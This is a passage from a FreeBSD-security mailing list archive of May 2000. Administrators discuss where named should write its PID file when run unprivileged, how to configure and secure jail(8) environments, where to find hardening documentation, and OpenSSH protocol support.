doesn't need to re-write this file when it reloads, even though it tries and complains about not being able to because it has dropped privileges. However, at some time we (FreeBSD community) may wish to have a named setup where the we don't have to rely on named dropping its privileges; the better solution of course is to only start it with the proper privileges, and the low-port allocation bit will be handled by a proper capabilities/ACL setup. If we ever move to this setup, where named is started with the lowered-permissions already, it will not be able to write out its pid file correctly. Hence, my suggestion is that the PID file for named be /var/run/named/named.pid. Having this be the location will solve two problems, the minor one of named complaining about not being able to write out it's pid file when reloading, and the future-possibility problem if named is started with lowered-privs, instead of having it drop privs. If we fix it now we don't have to worry about it later. Note that this change we may wish to have changed for many of our daemons (I already put apache's runtime stuff in /var/run/apache/, even though it runs as root). -- Frank Tobin http://www.uiuc.edu/~ftobin/ "To learn what is good and what is to be valued, those truths which cannot be shaken or changed." Myst: The Book of Atrus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 5:16:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from naiad.eclipse.net.uk (naiad.eclipse.net.uk [195.188.32.29]) by hub.freebsd.org (Postfix) with ESMTP id 3DC1F37B744 for ; Tue, 16 May 2000 05:16:09 -0700 (PDT) (envelope-from stuart@eclipse.net.uk) Received: by naiad.eclipse.net.uk (Postfix, from userid 475) id 3C0AE144C6; Tue, 16 May 2000 13:16:06 +0100 (BST) Date: Tue, 16 May 2000 13:16:06 +0100 From: Stuart Henderson To: Frank Tobin Cc: FreeBSD-security Mailing List Subject: Re: pid file for named Message-ID: <20000516131606.C16398@naiad.eclipse.net.uk> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from ftobin@uiuc.edu on Tue, May 16, 2000 at 06:48:05AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 16, 2000 at 06:48:05AM -0500, Frank Tobin wrote: > One often wishes to run daemons such as named under other users, e.g., > bind:bind. In order to allow bind to write out zones and associated fun > stuff correctly, one then does a For dns, surely djb's servers are a better choice where security is a priority? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 5:21:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (closed-networks.com [195.153.248.242]) by hub.freebsd.org (Postfix) with SMTP id 6BDD737B700 for ; Tue, 16 May 2000 05:21:53 -0700 (PDT) (envelope-from udp@closed-networks.com) Received: (qmail 7451 invoked by uid 1021); 16 May 2000 12:26:14 -0000 Date: Tue, 16 May 2000 13:00:10 +0100 From: User Datagram Protocol To: Frank Tobin Subject: Re: pid file for named Message-ID: <20000516130010.K2139@closed-networks.com> Reply-To: User Datagram Protocol References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from ftobin@uiuc.edu on Tue, May 16, 2000 at 06:48:05AM -0500 X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead Organization: Closed Networks Limited, London, UK Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 16, 2000 at 06:48:05AM -0500, Frank Tobin wrote: > One often wishes to run daemons such as named under other users, e.g., > bind:bind. In order to allow bind to write out zones and associated fun > stuff correctly, one then does a > > chmod -R bind:bind /etc/named > > However, the pid file, /var/run/named.pid, which named tries to write out ... I agree, for pre-jail FreeBSD versions, but the use of a jail would make it a bit of a moot point, wouldn't it? -- Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer WWW: www.closed-networks.com/~udp Dundee www.packetfactory.net/~udp United Kingdom email: udp@closed-networks.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 5:22: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (closed-networks.com [195.153.248.242]) by hub.freebsd.org (Postfix) with SMTP id 42D2737B700 for ; Tue, 16 May 2000 05:22:00 -0700 (PDT) (envelope-from udp@closed-networks.com) Received: (qmail 7455 invoked by uid 1021); 16 May 2000 12:26:21 -0000 Date: Tue, 16 May 2000 13:25:31 +0100 From: User Datagram Protocol To: Stuart Henderson Subject: Re: pid file for named Message-ID: <20000516132531.M2139@closed-networks.com> Reply-To: User Datagram Protocol References: <20000516131606.C16398@naiad.eclipse.net.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000516131606.C16398@naiad.eclipse.net.uk>; from stuart@eclipse.net.uk on Tue, May 16, 2000 at 01:16:06PM +0100 X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead Organization: Closed Networks Limited, London, UK Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 16, 2000 at 01:16:06PM +0100, Stuart Henderson wrote: > On Tue, May 16, 2000 at 06:48:05AM -0500, Frank Tobin wrote: > > One often wishes to run daemons such as named under other users, e.g., > > bind:bind. In order to allow bind to write out zones and associated fun > > stuff correctly, one then does a > > For dns, surely djb's servers are a better choice where > security is a priority? > I have no firm figures, just subjective time perception, but a box running djb's dnscache seemed a heck of a lot slower than another box running regular BIND at doing reverse lookups... The machines are both running 4.0-RELEASE and are of comparable spec. -- Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer WWW: www.closed-networks.com/~udp Dundee www.packetfactory.net/~udp United Kingdom email: udp@closed-networks.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 5:22:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from newmail.sentex.ca (newmail.sentex.ca [207.245.238.163]) by hub.freebsd.org (Postfix) with ESMTP id C2D9937B700 for ; Tue, 16 May 2000 05:22:41 -0700 (PDT) (envelope-from mike@sentex.net) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by newmail.sentex.ca (8.9.3/8.9.3) with ESMTP id IAA00850; Tue, 16 May 2000 08:22:39 -0400 (EDT) (envelope-from mike@sentex.net) Received: from chimp (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with ESMTP id IAA25657; Tue, 16 May 2000 08:22:38 -0400 (EDT) Message-Id: <4.2.2.20000516081548.034444a8@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Tue, 16 May 2000 08:18:59 -0400 To: Frank Tobin , FreeBSD-security Mailing List From: Mike Tancsa Subject: Re: pid file for named In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:48 AM 5/16/2000 -0500, Frank Tobin wrote: >One often wishes to run daemons such as named under other users, e.g., >bind:bind. In order to allow bind to write out zones and associated fun >stuff correctly, one then does a Actually, just make a subdirectory (eg /etc/namedb/s) and chown it. And in your options section of named.conf something like, directory "/etc/namedb"; pid-file "/etc/namedb/s/named.pid"; dump-file "s/named_dump.db"; ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 6:29:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.grove.ufl.edu (mail.grove.ufl.edu [128.227.8.6]) by hub.freebsd.org (Postfix) with ESMTP id C5F9A37B670 for ; Tue, 16 May 2000 06:29:30 -0700 (PDT) (envelope-from ahayford@grove.ufl.edu) Received: from willow.grove.ufl.edu (ahayford@willow-f [10.5.102.13]) by mail.grove.ufl.edu (8.9.3/8.9.3/h2) with ESMTP id JAA08218 for ; Tue, 16 May 2000 09:29:28 -0400 (EDT) From: Andrew J Hayford Received: from localhost (ahayford@localhost) by willow.grove.ufl.edu (8.9.3/8.9.3/c1) with ESMTP id JAA19967 for ; Tue, 16 May 2000 09:29:27 -0400 (EDT) Comments: JAA19967 on willow (hop 0), Tue, 16 May 2000 09:29:27 -0400 (EDT) Date: Tue, 16 May 2000 09:29:27 -0400 (EDT) X-Sender: ahayford@willow To: freebsd-security@freebsd.org Subject: Security Documentation Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings: I've been running a freebsd box at home as a hobby for a while and just recently have been given the resposibility of admining a box at work. I've been reading the posts here for a while and have caught glimpses of several security measures (chroot etc) that I would like to implement. Can anyone suggest a good url, book, faq, etc that goes over good ideas for making a box as secure as possible. Thanks in advance Andrew Hayford To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 6:35:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.interact.se (smtp1.interact.se [193.15.98.9]) by hub.freebsd.org (Postfix) with ESMTP id 676E837B875 for ; Tue, 16 May 2000 06:35:33 -0700 (PDT) (envelope-from je@interact.se) Received: from wolfie.interact.se (je@wolfie.interact.se [193.15.98.202]) by smtp1.interact.se (InterACT Mailer) with ESMTP id PAA26478; Tue, 16 May 2000 15:36:51 +0200 (CEST) Date: Tue, 16 May 2000 15:35:22 +0200 (CEST) From: Jonas Eriksson X-Sender: je@localhost To: Andrew J Hayford Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security Documentation In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >I've been running a freebsd box at home as a hobby for a while and just >recently have been given the resposibility of admining a box at work. I've >been reading the posts here for a while and have caught glimpses of >several security measures (chroot etc) that I would like to implement. Can >anyone suggest a good url, book, faq, etc that goes over good ideas for >making a box as secure as possible. Thanks in advance > >Andrew Hayford A good start is to read the Security Chapter in the FreeBSD handbook http://www.freebsd.org/handbook/security.html and your security(7) manpage. Regards -- Jonas Eriksson je@sekure.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 7:15:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from shell.telemere.net (shell.telemere.net [63.224.9.3]) by hub.freebsd.org (Postfix) with ESMTP id 13D1537B82E; Tue, 16 May 2000 07:15:22 -0700 (PDT) (envelope-from visigoth@telemere.net) Received: by shell.telemere.net (Postfix, from userid 1001) id 1295970601; Tue, 16 May 2000 09:14:30 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by shell.telemere.net (Postfix) with ESMTP id 0F18C6C808; Tue, 16 May 2000 09:14:30 -0500 (CDT) Date: Tue, 16 May 2000 09:14:30 -0500 (CDT) From: Visigoth To: Kris Kennaway Cc: freebsd-security@freebsd.org Subject: Re: qpopper discussion on BUGTRAQ In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks for the info, that was all I was looking for. ( No apoligies needed for the backlog issue... I could live at work and would still be knee deep ;) Thanks again Visigoth Damieon Stark Sr. Unix Systems Administrator visigoth@telemere.net ____________________________________________________________________________ | - M$ Win 2K was built for the internet. | - Unix _BUILT_ the internet. | FreeBSD - The POWER to serve | http://www.freebsd.org your call... | | ---------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 8:46:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 2522337B92A for ; Tue, 16 May 2000 08:46:51 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e4GGJX405390; Tue, 16 May 2000 09:19:33 -0700 (PDT) Date: Tue, 16 May 2000 09:19:33 -0700 From: Alfred Perlstein To: Frank Tobin Cc: FreeBSD-security Mailing List Subject: Re: pid file for named Message-ID: <20000516091932.J20000@fw.wintelcom.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from ftobin@uiuc.edu on Tue, May 16, 2000 at 06:48:05AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Frank Tobin [000516 05:22] wrote: > However, the pid file, /var/run/named.pid, which named tries to write out > one cannot give the proper permissions for, because it resides in a > root-owned directory /var/run. Granted, named writes out this file before > it drops privileges, and doesn't need to re-write this file when it > reloads, even though it tries and complains about not being able to > because it has dropped privileges. Actually there's an evil trick one can use: # cd /var/run # mkdir named # touch named/named.pid # ln -s named/named.pid . # chown named:named named # rm named/named.pid :) -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 9:58:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from loki.ideaglobal.com (loki.ideaglobal.com [194.36.20.54]) by hub.freebsd.org (Postfix) with ESMTP id CCCB637B62B for ; Tue, 16 May 2000 09:58:33 -0700 (PDT) (envelope-from kiril@loki.ideaglobal.com) Received: (from kiril@localhost) by loki.ideaglobal.com (8.9.3/8.9.3) id RAA01522; Tue, 16 May 2000 17:05:45 GMT (envelope-from kiril) From: Kiril Mitev Message-Id: <200005161705.RAA01522@loki.ideaglobal.com> Subject: GPL or not (was: Backend in Minivend) In-Reply-To: <4.3.1.2.20000515122445.04077a10@localhost> from Brett Glass at "May 15, 2000 12:35:49 pm" To: brett@lariat.org (Brett Glass) Date: Tue, 16 May 2000 17:05:45 +0000 (GMT) Cc: bright@wintelcom.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > A better example, which shows the real danger, is as follows. > Suppose that you run your e-commerce server on Debian Linux. Under > Perens' proposed regime, you would be forced to give away (for > free!) the code you used in your business because it was serving > the public and running on a GPLed OS. > > Talk about a nasty land grab. > > --Brett Just out of plain idle dumb curiosity - what about all those non_linux OS'es that are compiled with GCC ? (Oh, and mv to -chat, plz) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 10: 5:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 0449937B62B for ; Tue, 16 May 2000 10:05:20 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id NAA17027; Tue, 16 May 2000 13:05:04 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Tue, 16 May 2000 13:05:04 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Geoffrey Robinson Cc: security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 15 May 2000, Geoffrey Robinson wrote: > > ver: FreeBSD 4.0-STABLE #0: Sun May 14 11:06:58 EDT 2000 > > I'm planning to use jail in the near future to do two things. First is > to generally increase the security of a system by putting services like > http, smtp, ftp, etc. into separate jails to decrease the potential harm > of a security hole. This system will only allow shell accesses to > trusted individuals. The second plan is to create multiple, virtual > servers on another host system. These virtual servers will allow shell > access to semi-trusted individuals, including the jail root user. Also > the jail administrator could potentially run unsecure services. This > second plan is tentative depending on the reliability of jail. > > I have setup a test jail on my workstation with good results. The first > problem I have found is that I can't access the jailed IP at all from > the host system, nor the host system from the jailed one. However both > host and jailed IPs are accessible to other machines on the network. Is > this intentional? The jailed system can access the Internet fine through > my natd setup on the host system (which actually surprised me). I'm It sounds like a configuration error. Jail merely limits the scope of bindable addresses; it shouldn't limit connectivity between them unless that limit existed without the jail present. Check that you're aliasing the IPs properly -- specifically, that you're adding IP aliases with a netmask of 255.255.255.255. > aware that raw sockets are not allowed to jailed processes but is there > a workaround for ping and traceroute? Currently, no. Due to the way raw sockets work (allowing listening for all non-handled IP messages, and allowing direct writing of IP packets), it would take a bit of work to get this up and running, although it would be feasible. A more promising long-term goal might be to better virtualize network services, creating virtual interfaces and binding real network resources to virtual interfaces. However, that would be far more work. :-) > Finally how secure is jail really? I'm aware of a trivial chroot breakout > technique. Does that hole still exist? Are there any other known holes? Is > jail still under active development? Is it worth the trouble to do any of > this? As far as I know, none of the chroot() breakout mechanisms will work from jail(), as long as the jail() file system is constructed and maintained in a safe manner. For example, jail() prevents new device nodes from being introduced with mknod(). However, this assumes that (a) no improper device nodes existed in the accessible file space in the first place, and (b) root outside of jail() won't create them in the file space. Jail is being actively maintained; I have some ideas for it in the long term, but probably won't get to carrying them to fruition for a few months. This includes improved management capability (unique jailids, ability to deliver a signal to an entire jail from outside the jail, as well as special purpose binaries such as a jailinit to manage setup and shutdown of jails in an orderly manner. If you are interested in working on such features, I'd be glad to share design thoughts with you, as it will take me a while to get to this stuff. Right now my efforts are primarily aimed at improving the security abstractions within the kernel relating to the TrustedBSD project--this should have a side benefit of improving the relationship between jail() and the base OS, making Jail easier to maintain and modify. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 10:51: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from sivka.rdy.com (sivka.rdy.com [207.33.166.86]) by hub.freebsd.org (Postfix) with ESMTP id 48FF337B784 for ; Tue, 16 May 2000 10:50:45 -0700 (PDT) (envelope-from dima@rdy.com) Received: (from dima@localhost) by sivka.rdy.com (8.9.3/8.9.3) id KAA71328; Tue, 16 May 2000 10:50:09 -0700 (PDT) (envelope-from dima) Message-Id: <200005161750.KAA71328@sivka.rdy.com> Subject: Re: pid file for named In-Reply-To: from Frank Tobin at "May 16, 2000 06:48:05 am" To: Frank Tobin Date: Tue, 16 May 2000 10:50:09 -0700 (PDT) Cc: FreeBSD-security Mailing List Organization: HackerDome Reply-To: dima@rdy.com From: dima@rdy.com (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL68 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Frank Tobin writes: > One often wishes to run daemons such as named under other users, e.g., > bind:bind. In order to allow bind to write out zones and associated fun > stuff correctly, one then does a > > chmod -R bind:bind /etc/named > > However, the pid file, /var/run/named.pid, which named tries to write out You can set it in named.conf: options { ... pid-file "/etc/namedb/run/named.pid"; ... }; However, this will break "ncd", since it's looking for /var/run/named.pid instead of extracting current "pid-file" value from the named.conf. -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 11:15:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from srh0902.urh.uiuc.edu (srh0902.urh.uiuc.edu [130.126.76.224]) by hub.freebsd.org (Postfix) with SMTP id 1B5E637B9A4 for ; Tue, 16 May 2000 11:15:31 -0700 (PDT) (envelope-from ftobin@uiuc.edu) Received: (qmail 26626 invoked by uid 1000); 16 May 2000 18:15:28 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 May 2000 18:15:28 -0000 Date: Tue, 16 May 2000 13:15:28 -0500 (CDT) From: Frank Tobin X-Sender: ftobin@srh0902.urh.uiuc.edu To: Alfred Perlstein Cc: FreeBSD-security Mailing List Subject: Re: pid file for named In-Reply-To: <20000516091932.J20000@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alfred Perlstein, at 09:19 -0700 on Tue, 16 May 2000, wrote: > # cd /var/run > # mkdir named > # touch named/named.pid > # ln -s named/named.pid . > # chown named:named named > # rm named/named.pid Actually, named still complains about this, because I think it tries to actually unlink /var/run/named.pid; it doesn't seem to just want to overwrite it. -- Frank Tobin http://www.uiuc.edu/~ftobin/ "To learn what is good and what is to be valued, those truths which cannot be shaken or changed." Myst: The Book of Atrus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 11:22:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from enggate.uwi.tt (enggate.uwi.tt [196.3.139.34]) by hub.freebsd.org (Postfix) with SMTP id D06A737B62B for ; Tue, 16 May 2000 11:22:44 -0700 (PDT) (envelope-from Feisal.O.Mohammed@uwi.tt) Received: (qmail 6606 invoked by uid 0); 16 May 2000 18:21:20 -0000 Received: from ldc.eng.uwi.tt (192.168.20.31) by bsd.eng.uwi.tt with SMTP; 16 May 2000 18:21:20 -0000 Received: from feisalpc.eng.uwi.tt (router.eng.uwi.tt [192.168.20.195]) by ldc.eng.uwi.tt (8.9.1/8.9.1) with SMTP id OAA07903 for ; Tue, 16 May 2000 14:15:43 +0400 (GMT) Received: (qmail 66869 invoked from network); 16 May 2000 18:24:10 -0000 Received: from localhost.eng.uwi.tt (HELO uwi.tt) (127.0.0.1) by localhost.eng.uwi.tt with SMTP; 16 May 2000 18:24:10 -0000 Message-ID: <39219248.7628FC0A@uwi.tt> Date: Tue, 16 May 2000 14:24:09 -0400 From: Feisal Mohammed Organization: University of the West Indies X-Mailer: Mozilla 4.73 [en] (X11; U; FreeBSD 3.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD-security Mailing List Subject: Re: pid file for named References: <200005161750.KAA71328@sivka.rdy.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dima Ruban wrote: > > Frank Tobin writes: > > One often wishes to run daemons such as named under other users, e.g., > > bind:bind. In order to allow bind to write out zones and associated fun > > stuff correctly, one then does a > > > > chmod -R bind:bind /etc/named > > > > However, the pid file, /var/run/named.pid, which named tries to write out > > You can set it in named.conf: > > options { > ... > pid-file "/etc/namedb/run/named.pid"; > ... > }; > > However, this will break "ncd", since it's looking for /var/run/named.pid > instead of extracting current "pid-file" value from the named.conf. > > -- dima > That can be fixed as follows, I have two named running one on the inside interface and the other on the outside interface. -Feisal /* inside interface */ options { directory "/etc/namedb"; listen-on { x.in.si.de; }; forwarders { x.in.si.de; }; pid-file "/var/run/named-inside.pid"; }; controls { unix "/var/run/ndc-inside" perm 0600 owner xxx group xxx; }; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 11:46: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from sivka.rdy.com (sivka.rdy.com [207.33.166.86]) by hub.freebsd.org (Postfix) with ESMTP id 88A8737B97A for ; Tue, 16 May 2000 11:45:57 -0700 (PDT) (envelope-from dima@rdy.com) Received: (from dima@localhost) by sivka.rdy.com (8.9.3/8.9.3) id LAA71684; Tue, 16 May 2000 11:44:54 -0700 (PDT) (envelope-from dima) Message-Id: <200005161844.LAA71684@sivka.rdy.com> Subject: Re: pid file for named In-Reply-To: <39219248.7628FC0A@uwi.tt> from Feisal Mohammed at "May 16, 2000 02:24:09 pm" To: Feisal Mohammed Date: Tue, 16 May 2000 11:44:53 -0700 (PDT) Cc: FreeBSD-security Mailing List Organization: HackerDome Reply-To: dima@rdy.com From: dima@rdy.com (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL68 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Feisal Mohammed writes: > Dima Ruban wrote: > > > > Frank Tobin writes: > > > One often wishes to run daemons such as named under other users, e.g., > > > bind:bind. In order to allow bind to write out zones and associated fun > > > stuff correctly, one then does a > > > > > > chmod -R bind:bind /etc/named > > > > > > However, the pid file, /var/run/named.pid, which named tries to write out > > > > You can set it in named.conf: > > > > options { > > ... > > pid-file "/etc/namedb/run/named.pid"; > > ... > > }; > > > > However, this will break "ncd", since it's looking for /var/run/named.pid > > instead of extracting current "pid-file" value from the named.conf. > > > > -- dima > > > > That can be fixed as follows, I have two named running > one on the inside interface and the other on the outside > interface. It doesn't do much good, since you still have to type: ndc -c /var/run/ndc-inside whatever_command_you_want What I've meant is that ndc should have a simple parsing capabilities to extract most of the information it needs from named.conf > > -Feisal > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 12:30:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 93FE237BB08; Tue, 16 May 2000 12:30:24 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id MAA39376; Tue, 16 May 2000 12:30:24 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Tue, 16 May 2000 12:30:24 -0700 (PDT) From: Kris Kennaway To: Jonas Eriksson Cc: sen_ml@eccosys.com, security@FreeBSD.ORG Subject: Re: SSH1, SSH2, RSA, DES, etc etc In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 16 May 2000, Jonas Eriksson wrote: > OpenSSH has support for SSH1 and SSH2 > > http://www.OpenSSH.com/ Also in 5.0-CURRENT, soon to be coming to a 4.0-STABLE near you. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 14: 0:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from falcon.grobin.org (falcon.grobin.org [204.225.173.44]) by hub.freebsd.org (Postfix) with ESMTP id B474137B738; Tue, 16 May 2000 14:00:15 -0700 (PDT) (envelope-from geoff@grobin.org) Received: by falcon.grobin.org (Postfix, from userid 1000) id 9798B2EA; Tue, 16 May 2000 17:02:20 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by falcon.grobin.org (Postfix) with ESMTP id 913B42C2; Tue, 16 May 2000 17:02:20 -0400 (EDT) Date: Tue, 16 May 2000 17:02:20 -0400 (EDT) From: Geoffrey Robinson To: Robert Watson Cc: security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 16 May 2000, Robert Watson wrote: > On Mon, 15 May 2000, Geoffrey Robinson wrote: > > > > > ver: FreeBSD 4.0-STABLE #0: Sun May 14 11:06:58 EDT 2000 > > aware that raw sockets are not allowed to jailed processes but is there > > a workaround for ping and traceroute? > > Currently, no. Due to the way raw sockets work (allowing listening for > all non-handled IP messages, and allowing direct writing of IP packets), > it would take a bit of work to get this up and running, although it would > be feasible. A more promising long-term goal might be to better > virtualize network services, creating virtual interfaces and binding real > network resources to virtual interfaces. However, that would be far more > work. :-) If a process running in the host system created a UNIX domain socket or named pipe within the jail directory tree. Would a process running in the jail be able to connect to and communicate with the host process through this socket or pipe? If so I guess you could create work around for just about anything by running it on the host system. Would this create a potential way of defeating the jail? > As far as I know, none of the chroot() breakout mechanisms will work from > jail(), as long as the jail() file system is constructed and maintained in > a safe manner. For example, jail() prevents new device nodes from being > introduced with mknod(). However, this assumes that (a) no improper > device nodes existed in the accessible file space in the first place, and > (b) root outside of jail() won't create them in the file space. What about upgrading procedures? After my last cvsup and make world on the host system the jail could be started but could not access the network. I had to build a new jail from scratch to get it working properly. > Jail is being actively maintained; I have some ideas for it in the long > term, but probably won't get to carrying them to fruition for a few > months. This includes improved management capability (unique jailids, > ability to deliver a signal to an entire jail from outside the jail, as > well as special purpose binaries such as a jailinit to manage setup and > shutdown of jails in an orderly manner. If you are interested in working > on such features, I'd be glad to share design thoughts with you, as it > will take me a while to get to this stuff. I would like to try. I don't know how much help I could be. Please, let me know what I can do. I'll do what I can. ------------------------------------------------------------------------------ | Geoffrey Robinson - geoff@grobin.org | ------------------------------------------------------------------------------ Random Fortune Quote "MacDonald has the gift on compressing the largest amount of words into the smallest 